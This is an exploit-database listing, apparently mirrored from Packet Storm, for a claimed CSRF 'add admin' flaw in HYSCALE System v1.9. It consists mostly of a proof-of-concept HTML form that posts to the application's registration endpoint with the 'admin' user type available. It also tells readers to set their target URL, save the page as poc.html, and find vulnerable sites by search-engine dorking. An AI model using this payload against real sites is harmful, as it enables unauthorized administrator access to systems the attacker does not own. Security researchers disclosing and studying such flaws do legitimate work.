Share
## https://sploitus.com/exploit?id=PACKETSTORM:181597
=============================================================================================================================================  
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This HTML page is designed to remotely add new admin.  
  
[+] Line 10 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Registration Form</title>  
</head>  
<body>  
  
<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">  
  
<label for="username">Username:</label>  
<input type="text" name="username" id="username" required><br><br>  
  
<label for="email">Email:</label>  
<input type="email" name="email" id="email" required><br><br>  
  
<label for="password">Password:</label>  
<input type="password" name="password" id="password" required><br><br>  
  
<label for="dob">Date of Birth:</label>  
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>  
  
<label>Gender:</label><br>  
<input type="radio" name="gender" value="Male" id="male" required>  
<label for="male">Male</label><br>  
<input type="radio" name="gender" value="Female" id="female">  
<label for="female">Female</label><br><br>  
  
<label for="usertype">User Type:</label>  
<select name="usertype" id="usertype" required>  
<option value="admin">Admin</option>  
<option value="user">User</option>  
<option value="guest">Guest</option>  
</select><br><br>  
  
<label for="target_sales">Target Sales:</label>  
<input type="text" name="target_sales" id="target_sales" required><br><br>  
  
<input type="submit" value="Submit">  
  
</form>  
  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================